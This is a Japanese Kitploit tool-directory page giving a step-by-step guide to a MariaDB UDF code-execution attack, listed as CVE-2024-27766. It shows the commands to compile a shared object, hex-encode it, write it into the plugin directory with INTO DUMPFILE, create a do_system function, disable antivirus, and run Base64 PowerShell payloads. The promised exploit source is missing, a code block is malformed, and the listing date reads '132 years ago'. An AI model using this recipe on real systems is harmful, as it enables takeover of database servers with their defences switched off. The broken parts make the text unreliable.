Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/hissec/mysql_cve-2024-27766
脆弱性分析エクスプロイトペネトレーションテスト学習と教育ペイロード開発データベースセキュリティ
GitHubhissec/mysql_cve-2024-27766

Mysql_CVE-2024-27766

データベース認証済みコード実行

リポジトリを見る
132年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

エクスプロイト再現ガイド (影響を受ける製品バージョン: MariaDB 11.1)

このガイドでは、データベースシステムに対するユーザー定義関数 (UDF) 攻撃を再現するための段階的な手順を説明します。このエクスプロイトは一部のシステムでは動作する可能性がありますが、64ビットアーキテクチャや特定のビルドでは正しく機能しない場合があることに注意してください。

警告: これは教育目的のみのものです。これらの技術を無断で使用することは違法かつ非倫理的です。

攻撃を再現する手順

1. UDFコードのダウンロードと準備

まず、exploit.c という名前のファイルを作成し、次のコードを追加します:

root@kitploit:~

### 2. UDFコードのコンパイル

`x86_64-w64-mingw32-gcc` コンパイラを使用してエクスプロイトコードをコンパイルします:

```bash
x86_64-w64-mingw32-gcc -g -c exploit.c

3. 共有オブジェクトファイルの作成

コンパイルされたオブジェクトファイルから共有オブジェクトファイル (exploit.so) を生成します:

root@kitploit:~
x86_64-w64-mingw32-gcc -g -shared -Wl,-soname,exploit.so -o exploit.so exploit.o

4. 共有オブジェクトファイルの16進数への変換

xxd を使用して .so ファイルを16進数形式に変換します:

root@kitploit:~
xxd -p exploit.so | tr -d '\n' > hex_value.txt

5. 16進数値のデータベースへの読み込み

hex_value.txt から16進数値をコピーし、データベースで次のコマンドを実行します:

root@kitploit:~
DB> set @shell = 0x<hex_value>;

6. プラグインディレクトリの特定とエクスプロイトの展開

次のコマンドを実行してプラグインディレクトリを確認します:

root@kitploit:~
DB> select @@plugin_dir;

次に、プラグインディレクトリにエクスプロイト共有オブジェクトを作成します:

root@kitploit:~
DB> select binary @shell into dumpfile 'C:\\Program Files\\MariaDB 11.1\\lib\\plugin\\exploit.so';

注記: パスはシステムの構成や特定のプラグインディレクトリに合わせて調整してください。

7. 悪意のある関数の作成

エクスプロイトを使用してデータベースに新しい関数を作成します:

root@kitploit:~
DB> create function do_system returns integer soname 'exploit.so';

8. エクスプロイトの実行

エクスプロイトを妨げる可能性のあるアンチウイルスやWindows Defenderを無効にします。次に、新しく作成した関数を使用してコマンドを実行します:

root@kitploit:~
DB> select do_system('powershell base64 here');

'powershell base64 here' を、実行したいコマンドのBase64エンコードされたペイロードに置き換えます。


免責事項: この文書は教育目的およびセキュリティ研究のみを目的としています。この情報の悪用は、刑事告訴や重大な法的罰則につながる可能性があります。ネットワークやシステムで脆弱性をテストする前に、必ず関係機関から許可を得てください。

ツールをダウンロード